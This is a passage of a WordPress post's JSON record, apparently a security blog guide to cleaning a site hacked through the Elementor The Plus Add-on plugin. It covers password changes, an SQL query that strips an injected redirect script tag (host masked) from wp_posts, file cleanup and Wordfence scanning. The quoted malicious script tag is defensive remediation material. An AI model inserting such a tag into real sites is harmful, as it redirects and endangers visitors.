you need to have knowledge about Hosting, experience in file handling and a little&#8230; luck to handle the source code that has been attacked, following these steps:<\/p>\n<!-- \/wp:paragraph -->\n<!-- wp:heading {\"level\":4} -->\n<h4>STEPS TO HANDLE WHEN THE WEBSITE IS INFECTED WITH MALICIOUS CODE (FOR 3-5 DAYS)<\/h4>\n<!-- \/wp:heading -->\n<!-- wp:paragraph -->\n<p>If you have backed up your website, and <strong>BE 100% SURE THIS BACKUP DOES NOT BACK-UP VIRUSES<\/strong> Then you can restore the previous status quo and go to step number:<\/p>\n<!-- \/wp:paragraph -->\n<!-- wp:paragraph -->\n<p><strong>Step 1: <\/strong>Immediately change the database password (preferably the database name).<\/p>\n<!-- \/wp:paragraph -->\n<!-- wp:paragraph -->\n<p><strong>Step 2: <\/strong>Don't try to back up a website that has been infected with malware. You need to first delete all changed content in the database.<\/p>\n<!-- \/wp:paragraph -->\n<!-- wp:list -->\n<ul><li>Access phpMyAdmin<\/li><li>Access to the website's database<\/li><li>Find the wp_posts table (There are probably more tables that were attacked, but wp_posts is the first table you need to check)<\/li><li>Find the script &#8220;suspected&#8221; of being infected with malicious code (Review the example above)<\/li><li>Execute the following query to delete all infected content in the table (Replace the content in &lt;script&gt; &#8230; &lt;\/script&gt; with the corresponding malicious code.<\/li><\/ul>\n<!-- \/wp:list -->\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>UPDATE wp_posts SET post_content = (REPLACE (post_content, '&lt;script src=\\'***\/script.js?n=jee1\\' type=\\'text\/javascript\\'&gt;&lt;\/script&gt;', ''))<\/code><\/pre>\n<!-- \/wp:code -->\n<!-- wp:paragraph -->\n<p>After running the query, you have temporarily deleted all the redirection scripts that the hacker inserted into the Database.<\/p>\n<!-- \/wp:paragraph -->\n<!-- wp:paragraph -->\n<p>Step 3: Compress the entire source code of the infected website and download it to your computer. Use code editing software that allows opening by Folder. Here I use Visual Code to quickly find the content in the Folder and replace it in bulk.<\/p>\n<!-- \/wp:paragraph -->\n<!-- wp:list -->\n<ul><li>Identify the attacked javascript file<\/li><li>Copy malicious code verbatim<\/li><li>Delete all malicious code in the javascript file<\/li><li>Do the same with the PHP file<\/li><\/ul>\n<!-- \/wp:list -->\n<!-- wp:paragraph -->\n<p><strong>Step 4: <\/strong>Compress the source code folder with the malicious code removed, re-upload it to Hosting and decompress.<\/p>\n<!-- \/wp:paragraph -->\n<!-- wp:paragraph -->\n<p>In steps 3 and 4, you need to do it many times until the malicious code is completely removed from the website and is no longer redirected.<\/p>\n<!-- \/wp:paragraph -->\n<!-- wp:paragraph -->\n<p><strong>Step 5:<\/strong> Install the free Wordfence plugin at <a class=\"rank-math-link\" href=\"https:\/\/wordpress.org\/plugins\/wordfence\/\" rel=\"nofollow noopener\" target=\"_blank\">This<\/a>, conduct a Scan to find changed WordPress Core files (if any)<\/p>\n<!-- \/wp:paragraph -->\n<!-- wp:paragraph -->\n<p><strong>Step 6: <\/strong>Backup the &#8220;temporary stable&#8221; version and monitor for at least 3-5 more days.<\/p>\n<!-- \/wp:paragraph -->\n<!-- wp:paragraph -->\n<p>After performing the above steps, the website is accessible but it cannot be said that you are completely safe from hackers and security errors are constantly discovered by security experts and hackers. Always be alert and equipped with the best and latest security knowledge to protect your website and your customers.<\/p>\n<!-- \/wp:paragraph -->\n<!-- wp:paragraph -->\n<p>Sources cited in the article:<\/p>\n<!-- \/wp:paragraph -->\n<!-- wp:list -->\n<ul><li>Report dontkinhooot malware: https:\/\/www.joesandbox.com\/analysis\/356196\/0\/html<\/li><li>WordPress Vulnerabilities Explained: https:\/\/ithemes.com\/wordpress-vulnerabilities-explained\/<\/li><li>The Plus add-ons: https:\/\/theplusaddons.com\/elementor-news\/critical-0-day-the-plus-add-ons-vulnerability-fixed-in-48-hours\/<\/li><\/ul>\n<!-- \/wp:list -->\n<!-- wp:paragraph -->\n<p><em>This article was written by the FHC-Security team<\/em><\/p>\n<!-- \/wp:paragraph -->\n<!-- wp:html -->\n<!-- \/wp:html -->","protected":false},"excerpt":{"rendered":"<p>Report from the Plugin development team: Critical 0-Day The Plus Add-Ons Vulnerability Fixed Under 48 Hours Currently, WordPress websites that are using the Elementor The Plus Add-on plugin Pro version (The paid version is not currently affected), need to immediately update to update 4.1.7 (Download here This). According to reports from developers on the WordPress [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":2841,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_eb_attr":"","rank_math_title":"Wordpress Security Note: Serious security error of Elementor The Plus Add-on plugin (Update: Fixed from version 4.1.7)","rank_math_description":"Serious security error of Elementor The Plus Add-on plugin. How to fix hacked websites, redirect attacks, SQL Injection!","rank_math_focus_keyword":"wordpress security note","rank_math_canonical_url":"","rank_math_facebook_title":"Wordpress Security Note: Serious security error of Elementor The Plus Add-on plugin (Update: Fixed from version 4.1.7)","rank_math_facebook_description":"Serious security error of Elementor The Plus Add-on plugin. How to fix hacked websites, redirect attacks, SQL Injection!","rank_math_facebook_image":"https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-cover.jpg","rank_math_twitter_title":"Wordpress Security Note: Serious security error of Elementor The Plus Add-on plugin (Update: Fixed from version 4.1.7)","rank_math_twitter_description":"Serious security error of Elementor The Plus Add-on plugin. How to fix hacked websites, redirect attacks, SQL Injection!","rank_math_twitter_image":"","rank_math_schema_Article":[],"content_factory_provenance":[],"footnotes":"","_thumbnail_id":2841},"categories":[1,2302,2303,2296],"tags":[2304,2305,2306],"class_list":{"0":"post-18268","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-chua-phan-loai","8":"category-bao-mat-security-note","9":"category-hosting-may-chu","10":"category-the-gioi-cong-nghe-internet-24-7","11":"tag-elementor","12":"tag-the-plus-add-on","13":"tag-wordpress-security"},"_links":{"self":[{"href":"https:\/\/www.chantroituonglai.com\/en\/wp-json\/wp\/v2\/posts\/18268","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.chantroituonglai.com\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.chantroituonglai.com\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.chantroituonglai.com\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.chantroituonglai.com\/en\/wp-json\/wp\/v2\/comments?post=18268"}],"version-history":[{"count":3,"href":"https:\/\/www.chantroituonglai.com\/en\/wp-json\/wp\/v2\/posts\/18268\/revisions"}],"predecessor-version":[{"id":19154,"href":"https:\/\/www.chantroituonglai.com\/en\/wp-json\/wp\/v2\/posts\/18268\/revisions\/19154"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.chantroituonglai.com\/en\/wp-json\/wp\/v2\/media\/2841"}],"wp:attachment":[{"href":"https:\/\/www.chantroituonglai.com\/en\/wp-json\/wp\/v2\/media?parent=18268"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.chantroituonglai.com\/en\/wp-json\/wp\/v2\/categories?post=18268"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.chantroituonglai.com\/en\/wp-json\/wp\/v2\/tags?post=18268"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}